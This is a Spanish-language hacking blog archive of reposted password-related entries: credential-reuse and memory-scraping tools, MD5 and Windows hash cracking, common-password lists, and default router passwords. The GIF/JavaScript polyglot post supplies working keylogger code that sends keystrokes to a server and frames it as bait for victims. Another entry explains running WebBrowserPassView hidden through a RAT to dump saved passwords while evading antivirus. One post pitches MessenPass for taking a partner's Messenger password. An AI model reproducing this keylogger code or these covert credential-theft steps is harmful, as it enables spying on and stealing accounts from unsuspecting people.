Banner 1

Mostrando entradas con la etiqueta contraseñas. Mostrar todas las entradas
Mostrando entradas con la etiqueta contraseñas. Mostrar todas las entradas

shard: una herramienta para comprobar si se utiliza la misma contraseña en varios sitios

0 comentarios
Si hay algo imperativo en la sociedad digital actual es NO REUTILIZAR la misma contraseña para distintos servicios. La razón es simple: si uno de ellos es comprometido por ende cualquiera podrá obtener acceso al resto. No obstante, ya sea por la dificultad de recordar tantas contraseñas o por desconocimiento pura vagancia, son muchos los usuarios que todavía ponen la misma contraseña en varios de sus perfiles en redes sociales como Facebook, Twitter, LinkedIn, etc.

Y precisamente hoy vemos Shard, una herramienta para que los atacantes podamos detectar contraseñas compartidas desde la línea de comandos. Se trata de un fat jar (contiene todas las clases necesarias para hacerlo lo más portable posible) que si queréis podéis compilar vosotros mismos con sbt assembly, y también tiene una segunda implementación en python.

Uso

Sólo tenemos que indicar las credenciales a comprobar y la herramienta automatizará el proceso:
$ java -jar shard-1.2.jar -u username-here -p password-here
21:16:25.950 [+] Running in single credential mode
21:16:30.302 [+] username-here:password-here - Reddit, Instagram

También es posible probar múltiples credenciales (ummm leaks...) indicando un fichero de texto que contenga cada línea con el formato "username":"password". Incluso se puede personalizar el formato con la opción --format.
$ java -jar shard-1.2.jar -f /tmp/creds.txt
21:16:39.501 [+] Running in multi-credential mode
21:16:39.516 [+] Parsed 2 credentials
21:16:42.794 [+] username1:password1 - Reddit, Instagram
21:16:45.189 [+] username2:password2 - Facebook, LinkedIn, Twitter

Módulos

Actualmente soporta los siguientes módulos:
$ java -jar shard-1.2.jar -l
Available modules:
        Facebook
        LinkedIn
        Reddit
        Twitter
        Instagram

Aunque si queréis podéis añadir vuestros propios módulos fácilmente creando una nueva clase heredada de AbstractModule y añadiendo el módulo a ModuleFactory.
El AbstractModule tiene un método abstracto:

  def tryLogin(creds: Credentials): Boolean

Este método toma un objeto de credenciales y devuelve un valor booleano que indica un inicio de sesión correcto. Se recomienda el uso de la TwitterModule como plantilla.

Dependencias

     JSoup se utiliza para la comunicación HTTP y análisis de HTML
     spray-json se utiliza para el manejo de JSON

Githubhttps://github.com/philwantsfish/shard
Fuente: http://www.hackplayers.com/

mimikittenz: extracción de contraseñas en claro con ReadProcessMemory()/regex

0 comentarios
mimikittenz de Jamieson O'Reilly aka putterpanda (atentos a su foto de perfil en Github lol!) es una herramienta de post-explotación en powershell/C sharp que utiliza la función de Windows ReadProcessMemory() para extraer contraseñas en claro de varios procesos.

Su objetivo es facilitar a nivel de usuario (sin necesidad de privilegios de administrador) la extracción de datos sensibles con el fin de maximizar los esfuerzos en la fase de post-explotación y aumentar el valor de la información recogida por cada objetivo.


Actualmente mimikittenz es capaz de extraer las siguientes credenciales de la memoria:

Webmail
  •     Gmail
  •     Office365
  •     Outlook Web
Accounting
  •     Xero
  •     MYOB
Remote Access
  •     Juniper SSL-VPN
  •     Citrix NetScaler
  •     Remote Desktop Web Access 2012
Developement
  •     Jira
  •     Github
  •     Bugzilla
  •     Zendesk
  •     Cpanel
IHateReverseEngineers
  •     Malwr
  •     VirusTotal
  •     AnubisLabs
Misc
  •     Dropbox
  •     Microsoft Onedrive
  •     AWS Web Services
  •     Slack
  •     Twitter
  •     Facebook
Además, mimikittenz también puede extraer fácilmente otros tipos de *jugosa* información de procesos utilizando patrones de expresiones regulares que incluyen pero no se limitan a:

- datos de TRACK2 (tarjetas de crédio) de los procesos de venta/POS
- datos PII
- claves de cifrado y otros

Regex personalizado - la sintaxis para añadir expresiones regulares personalizadas es la siguiente:
[mimikittenz.MemProcInspector]::AddRegex("","")

Personalizar proceso objetivo - sólo hay que añadir el nombre del proceso dentro del array:
$matches=[mimikittenz.MemProcInspector]::InspectManyProcs("iexplore","chrome","firefox")

Nota: Esta herramienta tiene como objetivo el espacio de direcciones de memoria del proceso, una vez que se mata el proceso la memoria "debería" ser limpiada e inaccesible, sin embargo hay algunos casos extremos en los que esto no ocurre

Githubhttps://github.com/putterpanda/mimikittenz

Fuente: http://www.hackplayers.com/2016/07/mimikittenz-extraccion-de-contrasenas.html

Robar contraseñas usando gifs y javascript

0 comentarios
Ange Albertini (padre de Angecryption que más adelante veremos) es sin duda un auténtico mago a la hora de crear binarios "políglotas", que son ficheros que tienen simultáneamente varios formatos. Por ejemplo PDF/ZIP/JPG/Audio, PE/PDF/HTML/ZIP, TrueCrypt/PDF/ZIP, etc. Es decir, cada uno de estos ficheros pueden ser abiertos por varias aplicaciones sin error.

Una de las cosas que más nos interesan, dado el mundo de maldad y desenfreno en el que vivimos los hackers"piratas informáticos", es la técnica para abusar de la cabecera de los ficheros GIFs y añadir código Javascript. El resultado un fichero GIF que sea un fichero GIF y JS al mismo tiempo.

Imaginad... basta con publicar anónimamente una copia de una de las últimas imágenes robadas de alguna famosa y recibiremos miles y miles de visitas de incautas (pero satisfechas) víctimas, cuyos navegadores ejecutan de forma silenciosa código javascript...

Ajin Abraham planteaba un escenario similar y muy interesante con Xenotic. Nosotros haremos también una simple PoC cargando un sencillo keylogger con php. Ni que decir tiene que la demo es básica y no incluye cifrado, técnicas de evasión, ni filtros JS... eso y las fotos guarras las pone cada uno... XD

Primero vamos a apañar nuestro keylogger que publicaremos con cualquier servidor web con soporte php (en nuestro caso XAMPP). Para ello añadiremos al DocumentRoot estos tres archivos y echaremos a correr:

keylogger.php


php
if(!empty($_GET['c'])) {
    $logfile = fopen('data.txt', 'a+');
    fwrite($logfile, $_GET['c']);
    fclose($logfile);
}
?>

keylogger.js

var keys = '';
document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}
window.setInterval(function(){
    new Image().src = 'http://localhost/keylogger.php?c=' + keys;
    keys = '';
}, 1000);


index.html

 src="img.gif" />

Como podéis comprobar en el index.html se llama al mismo fichero gif como si fuera un script JS. ¿Cómo conseguimos que esto luego funcione? Pues el "truco" está en añadir “=1″ para que el motor JS no considere los caracteres de la cabecera como una variable no definida. Y luego, para escapar caracteres especiales, usamos las marcas de comentario “/*” y “*/”. De esta manera podremos llamar al javascript keylogger.js. Veamos el ejemplo construyendo nuestro gif malicioso desde ensamblador:


WIDTH equ 10799 ;  equivalente a 2f2a, que es '/*' en ASCII, para empezar a abrir un comentario
HEIGTH equ 100 ; sólo para que sea más fácil de detectar
db 'GIF89a'
    dw WIDTH, HEIGTH
db 0 ; GCT
    db -1 ; color de fondo
    db 0 ; relación de aspecto por defecto
db 02ch  ; descriptor de imagen
    dw 0, 0 ; NW corner
    dw WIDTH, HEIGTH ; ancho y alto de la imagen
    db 0 ; color de la tabla
db 2 ; tamaño lzw
db 0
db 3bh ; terminador del gif
db '*/' ; cierre del comentario
db '=1;' ; para falso uso de esa cadena GIF89a
;db ' alert(1) '
db 's = document.createElement("script");' 
db 's.src = "http://localhost/keylogger.js";'
db 'document.body.appendChild(s);'

El resultado al compilarlo con YASM y visto en hexadecimal será el siguiente:

yasm gifjs.asm -o img.gif



Para comprobar que funciona abrimos la URL local con Chrome, vemos la imagen, pulsamos F12 y comprobamos que nuestro keylogger está en funcionamiento:






Ahora mira la siguiente imagen y... mientras la miras... piensa... y analiza si tú también has podido ser jodido comprometido... ;)

 

Fuente:  http://www.hackplayers.com/2014/11/el-GIF-que-tambien-queria-ser-JS.html

Las peores contraseñas numéricas de 5 dígitos

0 comentarios
Cuando tenemos un sistema que recibe 5 dígitos numéricos como contraseña, las posibilidades de encontrar un código valido son muy altas, pero aun así, muchas veces necesitamos acortar el tiempo de “crackeo” para no tener que ir de forma secuencial, desde el 00000 al 99999 para encontrar el código valido. En estos casos es cuando entran al juego los listados de contraseñas más utilizados, archivos que enumeran las claves más usadas por los usuarios y las ubican de forma tal que entre más utilizada sea una contraseña, mas arriba se encuentre, para que cuando iniciemos nuestras pruebas con este tipo de listado, exista la posibilidad que terminar el trabajo antes.

Como no encontré un listado de más de 10 contraseñas comunes que usen 5 dígitos, me di a la tarea de buscar en los tops de passwords, leaks de diferentes servicios, diccionarios que agrupan otros diccionarios y hábitos de claves que tienen las personas, para sacar el típico listado con las 10 claves más usadas con 5 dígitos, pero además un completo listado que cubra las 99999 posibilidades, pero poniendo en los primeros lugares las contraseñas más usadas de 5 dígitos que se encontraron, de esta forma si encontramos la clave en estos primeros passwords, ahorramos un poco tiempo, pero si no, sería cuestión de esperar para dar con la clave.

TOP 10 Claves 5 Digitos Las peores contraseñas numéricas de 5 dígitos 

Les dejo el enlace de descarga, para bajar todo el diccionario con el top 100000 de claves numéricas de 5 dígitos.

Fuente: http://www.dragonjar.org/las-peores-contrasenas-numericas-de-5-digitos.xhtml

WebBrowserPassView - Recupera contraseñas navegadores

0 comentarios


WebBrowserPassView es una herramienta de recuperación de contraseña que revela las contraseñas almacenadas por los siguientes navegadores Web: Internet Explorer (Version 4.0 - 10.0), Mozilla Firefox (todas las versiones), Google Chrome, Safari y Opera. Esta herramienta puede ser utilizada para recuperar su / contraseña perdida olvidada de cualquier sitio web, incluyendo sitios web populares, como Facebook, Yahoo, Google y Gmail, siempre y cuando la contraseña se almacena en tu navegador web.
Después de recuperar las contraseñas perdidas, puede guardarlos en texto / html / csv / xml, mediante el uso de la opción

Como dice el texto citado es para recuperar contraseñas y funciona muy bien, ahora un buen dato:

Esta herramienta parece molesta para abrirla desde un remoto y tratar de controlarla pero tiene una ventaja muy buena para vos piyin que seguro queres hacer todo oculto sin que nadie vea nada, como un golpe en la oscuridad que nadie se hace cargo 

- Subimos el archivo WebBrowserPassView.exe al remoto y lo ubicamos en el disco "C" por ejemplo.

- Entramos con el rat a la consola de comandos, nos situamos en la carpeta donde esta el ejecutable y escribimos esto


start WebBrowserPassView.exe /stext pass.txt


/stext lo que hace es guardar todos las contraseñas en este caso yo le puse "pass.txt" . Entonces cuando ejecutamos el comando el programa no sale visible y automaticamente crea el archivo con las contraseñas guardadas ...

Si escaneas el archivo por algun scanner te sale que lo detectan vaaarios antivirus , pero cuando lo hice remotamente de el modo en el que lo explique no salto de ninguna manera el AV del cliente , nose ni como ni cuando ni por que pero funciona.

Descarga de la web del autor 

http://www.nirsoft.net/utils/webbrowserpassview.zip

Fuente: http://blog.underc0de.org/2014/04/webbrowserpassview-recupera-contrasenas.html

Cómo recuperar una clave en MD5

0 comentarios

La criptografía es utilizada para la proteger la información sensible de usuarios no autorizados, en una de ramas se encuentran los algoritmos de hash los cuales se encargan de asignan un valor numérico a cada carácter dentro del texto/archivo y generar un “hash” único (en teoría) para este.

En esta entrada pretendo recopilar los distintos métodos que tenemos para recuperar una clave o texto codificado con el algoritmo MD5, uno de los mas utilizados actualmente .

Candado MD5

Antes de empezar definamos qué es MD5:

Es uno de los algoritmos de reducción criptográficos diseñados por el profesor Ronald Rivest del MIT (Massachusetts Institute of Technology, Instituto Tecnológico de Massachusetts), Ampliamente utilizado en aplicaciones web (principalmente para almacenar contraseñas), para verificar la integridad de archivos y en.

Métodos para recuperar una Clave en MD5

Ataque de Fuerza Bruta

El MD5 es un algoritmo unidireccional (permite codificar mas no decodificar), por eso para validar las entradas es necesario pasarlas primero por el algoritmo para después comparar el hash generado con el que esta almacenado previamente, una de las primeras ideas que nos llega a la mente para “decodificar” algo en MD5 es realizar un ataque por fuerza bruta, donde codifiquemos caracteres desde aaaaaaa…a hasta zzzzzzz…z comparando con el hash que tenemos para ver si coincide.

Existen portales que se dedican a realizar este ataque de fuerza bruta y a almacenar en su base de datos la cadena de caracteres con su respectivo hash en MD5 por lo tanto lo primero que debemos hacer es comprobar si el hash que tenemos ya ha sido almacenado en alguna de estas bases de datos, si es asi podremos ahorrarnos mucho tiempo.

Bases de Datos para crackear MD5

Aquí les dejo un listado con las bases de datos con mas registros, este es el primer paso que se debe realizar solo tendremos que colocar el hash en el campo de texto y consultar si este ya esta en la base de datos, no es demorado y puede ahorrarnos mucho tiempo (click en la imagen para visitar la pagina).

Hash Database
authsecu.com

Crack MD5
md5decrypter.com

Database MD5 Crack
gdataonline.com

Database MD5
shm.hard-core.pl

CheckSum MD5
md5.shalla.de

Bases de Datos MD5 Hash
md5.rednoize.com

MD5 Hash DB
insidepro.com

MD5
passcracking.com

Y existen muchas mas solo es cuestión de buscar, recuerda probar primero el hash que tienes en cuanta base de datos de este tipo encuentres ya que el tiempo que gastas buscando nuevos portales con DB lo recuperas con creces si encuentras el pass decodificado en uno de ellos.

Software para Realizar Ataques de Fuerza Bruta a claves con MD5

Si la búsqueda en las bases de datos no te arrojo resultados positivos puedes realizar el ataque desde tu propia maquina, existe mucho software que puedes utilizar para este fin.

En mi experiencia personal el mejor programa para realizar ataques de fuerza bruta a una clave codificada con MD5 es el MDCRACK así que solo realizare un pequeño tutorial de como manejar este software y les pondré un listado de las otras alternativas que tienes para recuperar tu password en MD5 por este medio.

Manual MDCRACK

Lo primero que debemos hacer es descargar el MDCRACK de la pagina oficial lo descomprimimos e iniciamos un terminal (inicio/ejecutar/cmd.exe) ubicándonos en la carpeta donde tengamos el archivo MDCrack-sse.exe y ejecutamos el comando

MDCrack-sse.exe f4d09a31cd15e26c0a150e595511c90e

Con este comando el MDCrack empezará a realizar el ataque contra el hash que le hemos ingresado como parámetro utilizando las opciones por defecto, es decir todas las combinaciones de letras en minúsculas, MAYUSCULAS y num3r0s con un tamaño de password máximo de 12 caracteres.

En la mayoría de los casos esa configuración es la apropiada ya que no es muy común (lamentablemente) encontrar passwords de mas de 8 caracteres y con S!m&ol@s.

Despues empezara a aparecer en pantalla algo parecido a esto:
Password size: 1

Password size: 2

Password size: 3

Password size: N..

Hasta que aparezca el resultado del ataque

----------------------------------------
Collision found ! => Comunidad DragonJAR (este es el password en md5 crackeado)

Si no te aparece el resultado deberás introducir una configuración personalizada:

Si queremos que además de minúsculas, MAYÚSCULAS y nu3r0s aparezcan también S!m&ol@s debemos ingresar lo siguiente en consola:


MDCrack-sse.exe -s abcdefghijklmnopqrstuvwxyzABCDEFGHIJKMNOPQRSTUVWXYZ0123456789!&@ f4d09a31cd15e26c0a150e595511c90e

Como puedes ver para ingresar parámetros personalizados se llama el programa con el la opción -s seguido de todos los caracteres que quieres usar, en este caso todas las letras (menos la ñ ni Ñ que no son soportadas) en minúsculas y MAYÚSCULAS, todos los números del 0 al 9 y los 3 símbolos usados en la clave de ejemplo !&@.

Puedes realizar las combinaciones que quieras, por ejemplo si sabes que la mayoría de claves se escriben en minúscula puedes ahorrarte mucho tiempo colocando como parámetro solo las minúsculas.

Si quieres pausar la tarea y resumir mas tarde solo tienes que crear la carpeta c:\temp en esta se guardara lo que llevas, cuando quieras resumir ejecuta el MDCrack sinr ningún parámetro el revisara la carpeta y continuara el trabajo.

Es recomendado también si quieres otras tareas en el equipo mientras realizas el ataque es recomendable que le asignes una prioridad de “muy bajo” al proceso desde el administrador de tareas, de lo contrario tu pc quedara muy lento por la cantidad de recursos que consume el mdcrack y no podras hacer nada mas.

Originalmente el mdcrack solo esta disponible por linea de comandos, pero existen varios front ends realizados por terceros para las personas que no son muy amigas de la consola, el mas completo es este frontend en VB desarrollado por nulladd con el cual puedes configurar fácilmente los parámetros de este programa pero en la pagina del proyecto encontraras otros.

Free Image Hosting at www.ImageShack.us

El MDCrack funciona sin ningun problema con wine por lo que el sistema operativo no es una limitación.

Pagina Oficial del MDCrack

Con esto termino el pequeño tutorial sobre MDCrack, ahora les daré un listado de otras herramientas utilizadas para realizar ataques de fuerza bruta a hash en MD5.

Cain & Abel, Password Cracker

Cain & Abel

Una de las mejores herramientas para recuperación de passwords en Windows, para utilizarlo con claves en MD5 solo tienes que ir a la Pestaña “Cracker” luego en “MD5 Hashes” le das en el “+” y metes el hash.

Pagina Oficial de Cain & Abel

Documentacion del Cain & Abel

John The Ripper

John The Ripper

John the Ripper es un clásico entre las herramientas para realizar ataques de fuerza bruta, desde hace un tiempo soporta ataques a hash en MD5 y aunque no es tan rápido en esta tarea como el mdcrack es otra opción que tienes.

Pagina oficial del John The Ripper

Otras herramientas para Realizar Ataques de Fuerza Bruta a hash MD5

Google MD5 Crack
Google

Hace unos meses comentaba una noticia donde se comentaba sobre el uso de Google para descifrar Password MD5, no debe ser una de tus primeras opciones pero si deberías tenerla en cuenta.

Elf Wizard The Ripper MD5
Elf Wizard The Ripper MD5

Este es un proyecto elaborado por WHK el cual consiste en un sistema basado PHP donde se ingresa una serie de palabras con sus respectivos hashes en MD5 a una base de datos en MySQL, lo que diferencia este sistema de las bases de datos es que permite ingresar listas de palabras, y ademas sacar palabras de búsquedas especificas en google o de cualquier pagina web.

Pagina Oficial del Elf Wizard The Ripper MD5

En IronGeek publicaron un video donde explican varios de los métodos expuestos en este articulo para decodificar passwords en MD5.

Podemos concluir que aunque los hash agregan un pequeño obstáculo entre el atacante y la clave, no podemos confiar en el y es recomendable utilizar contraseñas con mas de 12 caracteres 4lph4num3r1c0s y con s!m&olºs para hacer de la tarea del atacante sea un poco mas dispendiosa.

Si tienes alguna otra forma de realizar no olvides comentarla y la agregare a esta entrada.

via portal dragon

Ophcrack con soporte para Windows Vista

1 comentarios

Ophcrack es una herramienta que se ha mencionado de manera muy superficial en la Web, y es extraño, pues muchos de nosotros la utilizamos con regularidad.

Ya DragoN había hecho un acercamiento a esta herramienta en su magnifico post sobre “Recuperar contraseñas de Windows Vista y anteriores“. Pero no se había sacado un apartado especial para hablar sobre ella. Veamos.

ophcrackqa5 Ophcrack con soporte para Windows Vista

Ophcrack es una herramienta para crackear las contraseñas de Windows basada en las tablas Rainbow. Es una implementación muy eficiente de las tablas rainbow hecha por los inventores de este método. Viene con una Interfaz Gráfica de Usuario GTK+ y corre bajo Windows, Mac OS X (CPU Intel) y también en Linux.La versión incluye las siguientes mejoras:

  • Soporte para Vista
  • Bkhive 1.1.0
  • Samdump2 1.1.0
  • Soporte para crackear hashes LM con caracteres alemanes
  • Facilidad de cambiar las tablas en el LiveCD

Caracteristicas:

  • Corre bajo Windows, Linux y Mac OS X (intel).
  • Rompe hashes LM y NTLM.
  • Tablas libres disponibles para hashes LM alfanuméricos.
  • Carga hashes desde SAM local y SAM remota.
  • Carga hashes desde SAM encriptadas recuperadas desde una partición Windows, incluyendo Vista.

Además, el equipo de IronGeek cuenta con un video explicativo de uso de la herramienta (ver video desde IronGeek).

Como si fuera poco existe una versión LiveCd de esta herramienta:

El LiveCD de Ophcrack contiene un sistema Linux completo (SLAX), ophcrack para Linux y las tablas Rainbow para contraseñas alfanuméricas.

El liveCD crackea las contraseñas automáticamente, sin necesidad de una instalación y sin la necesidad de conocer la contraseña de administrador (solo es necesario arrancar desde el CD).
Desde la versión 1.1.4 crackea el archivo SAM de Windows Vista.

Descargar Ophcrack
Descargar Ophcrack LiveCD (iso)
Documentación y otras fuentes sobre Ophcrack (I, II, III)

via dragon

Bruter - Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows

1 comentarios

Se ha puesto en libertad el Bruter 1,0 BETA1. Bruter es una Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows, Diseñada para demostrar la importancia de elegir contraseñas seguras.

Bruter soporta una variedad de servicios que permiten la autenticación remota, a continuación les dejo un listado de los servicios soportados:

  • FTP
  • HTTP (Básico)
  • HTTP (Formulario)
  • IMAP
  • MSSQL
  • MySQL
  • POP3
  • SMB-NT
  • SMTP
  • SNMP
  • SSH2
  • Telnet

Dependencia

Lamentablemente Bruter solo funciona en entornos Windows, aunque no se descarta la posibilidad de una versión para otros sistemas en un futuro.

Descargar Bruter:

Bruter_1.0_beta1.zip

Mas Información Pagina oficial del Bruter.

via dragon

Lista de Contraseñas por defecto para Routers

0 comentarios

Gracias a meneame me encuentro con un portal bastante interesante, se trata de routerpasswords.com un sitio donde nos proporcionan las contraseñas por defecto de una enorme cantidad de routes (si no esta el tuyo puedes solicitar que lo ingresen a su db llenando esta solicitud) ordenados por y por fabricante.

contraseñas por defecto routers

Su funcionamiento es muy sencillo solo tenemos que seleccionar el fabricante del router al que queremos averiguar su password por defecto y le damos en “Find Password”, después de esto nos aparecerá un listado de routers de la marca seleccionada, con el modelo, protocolo, nombre de usuario y contraseña.

Lista de contraseñas router por defecto.

Recuerda que debes cambiar la contraseña por defecto de tu router apenas lo instales en tu red, además de cambiar esta periódicamente.

Entrar a Router Passwords

via dragon

PassPub, Generador de Contraseñas Seguras

0 comentarios

Anteriormente les había hablado sobre Myvidoop una aplicación web que permite administrar nuestras contraseñas fácilmente.

Hoy les presento PassPub una herramienta que nos permite generar contraseñas seguras sin mucho esfuerzo y con una interface sencilla y amigable.

Generar Contraseñas

Recordemos que un password seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi la tarea de recuperar este por métodos como fuerza bruta, obviamente este tipo de contraseñas es mucho mas difícil de recordar que “micontrasena1″ pero es mucho mas seguro (ademas para administrar nuestras contraseñas tenemos Myvidoop)

PassPub nos permite generar contraseñas de 64, 128 o 256bits para redes inalambricas, también podemos generar passwords de 6, 8, 10 o 12 caracteres de longitud, convinaciones basadas en la tabla periodica y otras convinaciones.

Generar Passwords con PassPub

Mas Información:
Puedes encontrar mas información en (I II III IV V)


encontrado via dragon

Usando Google para descifrar Password MD5

1 comentarios

En slashdot leo la noticia de un “analista de seguridad” el cual fue defaceado por no actualizar su instalación de WordPress… resulta que el cracker creó un usuario en el sistema y el analista saco la clave encriptada en MD5, la puso en google y el resultado obtenido le sorprendió.

Google Crackeador de MD5

Al buscar la cadena de caracteres “20f1aeb7819d7858684c898d1e98c1bb” (la clave del nuevo usuario encriptada en MD5) encontró 2 paginas la primera un árbol genealógico sobre los Anthony, y otra de venta de una casa en que el campo del dueño tenia este string y el nombre era Anthony.

Probó con la contraseña “Anthony” y logró entrar al sistema, es curioso como al buscar esta cadena encriptada en MD5 arrojo como resultado el valor decodificado de este.

Yo busque el valor “dragon” codificado en MD5 “8621ffdbc5698829397d97767ac13db3” y de los resultados que me arrojo google casi el 100% estaba relacionado con la palabra dragon.

A pesar que existen muy buenas bases de datos que permiten decodificar claves de MD5 como md5decrypter o md5.rednoize.com (hay muchas mas) las cuales funcionan codificando una palabra, almacenándola en una base de datos y cuando se busca una palabra especifica, busca en la base de datos y se comparan los valores en MD5 y nos muestra el valor decodificado, no esta de mas buscar la cadena de caracteres codificada en MD5 para ver que nos arroja google.

Otras personas que hablan de la noticia (I II III IV)


encontrado via dragon

Las Peores 500 Contraseñas de Todos los Tiempos

0 comentarios

Desde el momento en que la gente comenzó a utilizar contraseñas, no tardaron en darse cuenta que varias personas utilizaban la misma contraseña una y otra vez, incluso la forma en que las personas escriben erróneamente las palabras es coherente; Normalmente las personas son tan previsibles que la mayoría de los hackers hacen uso de listas de contraseñas comunes como las publicadas en este articulo.

Para darle una idea de cómo los seres humanos son predecibles, la siguiente es una lista de las 500 contraseñas más comunes. Tenga en cuenta que cada contraseña que figuran aquí se ha utilizado por lo menos cientos si no miles de veces por otras personas.

“Aproximadamente uno de cada nueve personas por lo menos utiliza una contraseña en la lista, Y uno de cada 50 personas utiliza una de las 20 primeras peores contraseñas”.

NO Top 1-100 Top 101–200 Top 201–300 Top 301–400 Top 401–500
1 123456 porsche firebird prince rosebud
2 password guitar butter beach jaguar
3 12345678 chelsea united amateur great
4 1234 black turtle 7777777 cool
5 pussy diamond steelers muffin cooper
6 12345 nascar tiffany redsox 1313
7 dragon jackson zxcvbn star scorpio
8 qwerty cameron tomcat testing mountain
9 696969 654321 golf shannon madison
10 mustang computer bond007 murphy 987654
11 letmein amanda bear frank brazil
12 baseball wizard tiger hannah lauren
13 master xxxxxxxx doctor dave japan
14 michael money gateway eagle1 naked
15 football phoenix gators 11111 squirt
16 shadow mickey angel mother stars
17 monkey bailey junior nathan apple
18 abc123 knight thx1138 raiders alexis
19 pass iceman porno steve aaaa
20 fuckme tigers badboy forever bonnie
21 6969 purple debbie angela peaches
22 jordan andrea spider viper jasmine
23 harley horny melissa ou812 kevin
24 ranger dakota booger jake matt
25 iwantu aaaaaa 1212 lovers qwertyui
26 jennifer player flyers suckit danielle
27 hunter sunshine fish gregory beaver
28 fuck morgan porn buddy 4321
29 2000 starwars matrix whatever 4128
30 test boomer teens young runner
31 batman cowboys scooby nicholas swimming
32 trustno1 edward jason lucky dolphin
33 thomas charles walter helpme gordon
34 tigger girls cumshot jackie casper
35 robert booboo boston monica stupid
36 access coffee braves midnight shit
37 love xxxxxx yankee college saturn
38 buster bulldog lover baby gemini
39 1234567 ncc1701 barney cunt apples
40 soccer rabbit victor brian august
41 hockey peanut tucker mark 3333
42 killer john princess startrek canada
43 george johnny mercedes sierra blazer
44 sexy gandalf 5150 leather cumming
45 andrew spanky doggie 232323 hunting
46 charlie winter zzzzzz 4444 kitty
47 superman brandy gunner beavis rainbow
48 asshole compaq horney bigcock 112233
49 fuckyou carlos bubba happy arthur
50 dallas tennis 2112 sophie cream
51 jessica james fred ladies calvin
52 panties mike johnson naughty shaved
53 pepper brandon xxxxx giants surfer
54 1111 fender tits booty samson
55 austin anthony member blonde kelly
56 william blowme boobs fucked paul
57 daniel ferrari donald golden mine
58 golfer cookie bigdaddy 0 king
59 summer chicken bronco fire racing
60 heather maverick penis sandra 5555
61 hammer chicago voyager pookie eagle
62 yankees joseph rangers packers hentai
63 joshua diablo birdie einstein newyork
64 maggie sexsex trouble dolphins little
65 biteme hardcore white 0 redwings
66 enter 666666 topgun chevy smith
67 ashley willie bigtits winston sticky
68 thunder welcome bitches warrior cocacola
69 cowboy chris green sammy animal
70 silver panther super slut broncos
71 richard yamaha qazwsx 8675309 private
72 fucker justin magic zxcvbnm skippy
73 orange banana lakers nipples marvin
74 merlin driver rachel power blondes
75 michelle marine slayer victoria enjoy
76 corvette angels scott asdfgh girl
77 bigdog fishing 2222 vagina apollo
78 cheese david asdf toyota parker
79 matthew maddog video travis qwert
80 121212 hooters london hotdog time
81 patrick wilson 7777 paris sydney
82 martin butthead marlboro rock women
83 freedom dennis srinivas xxxx voodoo
84 ginger fucking internet extreme magnum
85 blowjob captain action redskins juice
86 nicole bigdick carter erotic abgrtyu
87 sparky chester jasper dirty 777777
88 yellow smokey monster ford dreams
89 camaro xavier teresa freddy maxwell
90 secret steven jeremy arsenal music
91 dick viking 11111111 access14 rush2112
92 falcon snoopy bill wolf russia
93 taylor blue crystal nipple scorpion
94 111111 eagles peter iloveyou rebecca
95 131313 winner pussies alex tester
96 123123 samantha cock florida mistress
97 bitch house beer eric phantom
98 hello miller rocket legend billy
99 scooter flower theman movie 6666
100 please jack oliver success albert

Hay algunas claves interesantes en esta lista que muestran cómo la gente trata de ser inteligente, pero incluso el ingenio humano es predecible. Por ejemplo, mire las siguientes contraseñas:

  • ncc1701 El buque número ncc1701 de Starship Enterprise
  • thx1138 El nombre de la primera película de George Lucas
  • qazwsx un simple patrón de los teclados QWERTY
  • 666666 el números seis, seis veces
  • 7777777 siete sietes
  • ou812 El título de un álbum de Van Halen 1988

Si usted observa que su contraseña se encuentra en esta lista, por favor, cámbiela de inmediato, en la comunidad hemos proporcionado siempre información útil para maneja tus contraseñas fácilmente, herramientas para generar contraseñas seguras, e incluso aplicaciones que si no quieres utilizar una palabra clave, te permiten utilizar tu rostro como contraseña.

Fuente whatsmypass.com

via dragonnews

Post dedicado a las contraseñas

0 comentarios

Algunas de estas herramientas ya las he publicado en usb hacking donde se ejecutan al insertar la memoria con el autorun.inf y ademas son portables , pero si quieren las versiones normales aqui las tienen , saludos y agradecimientos a bloginformatico.com por sus post :D


Descubre contraseñas de Windows Live Messenger… y otros

En más de una ocasión he recibido alguno que otro correo por parte de cualquier lector desesperado por descubrir la contraseña de su novia (porque cree que le es infiel), o qué sé yo, cantidad de correos preguntándome lo mismo. Hoy les daré una solución aceptable.

Claro está que no existe (hasta ahora) un programa mágico donde ingreses el correo de la persona que quieres saberle la contraseña, y te la dé en unos segundos después; ésto es debido al excelente sistema de seguridad que implementa Microsoft para su protocolo de mensajería instantánea, lo cual es algo que no se ha podido romper hasta el día de hoy.

Pues bien, ese no es un tema que nos compete. MessenPass es el programa que nos ayudará a descubrir la contraseña de cualquier cuenta (ID) de Windows Live Messenger siempre y cuando tenga la opción “recordar usuario y contraseña” activada, de resto no.

MessenPass es compatible con los siguientes clientes de mensajería instantánea: MSN Messenger, Windows Live Messenger, ahoo Messenger, ICQ Lite, AOL Instant Messenger, Trillian, Miranda o Gaim, entre otros. Los resultados pueden exportarse en formato HTML.

Visto en SnapFiles
Enlace | MessenPass


Dirección de correo anónima y temporal en Anonymbox.com

Más sobre: Aplicaciones Web, Internet, Seguridad

En su ocasión estuvimos hablando sobre MintEmail, un sitio que nos provee un servicio bastante similar al que trataremos hoy el cual se llama Anonymbox.com.

Pues bien amigos, Anonymbox.com nos permite generar un correo anónimo temporal de forma aleatoria, es decir que el sistema elegirá un nombre para tu cuenta, como también tú mismo puedes elegir el nombre de usuario del estilo tucorreo@anonymbox.com.

Durante 12 horas tendrás a tu completa disponibilidad la cuenta en Anonymbox.com, y los correos puedes revisarlos desde varios medios, puede ser en la misma página así como también canales de feeds (RSS), y hasta te permite ampliar el tiempo a 12 horas más.

Vía | KillerStartups.com
Enlace | Anonymbox.com


Guarda textos online y protégelos con contraseñas en iLocker

Posiblemente se estén preguntando ¿qué utilidad tiene guardar textos en una página web y protegerlos con contraseña? Pues, imagínense que queremos enviar una nota de amor a nuestra pareja, ¿no es útil enviársela preferiblemente protegida con contraseña?

Y es que las posibilidades de iLocker son inimaginables, pues tú pones el límite. Se trata de un sencillo editor de texto plano en donde ingresar cualquier texto, el que queramos, y luego podremos guardarlo (encriptarlo) con la contraseña que nosotros establezcamos.

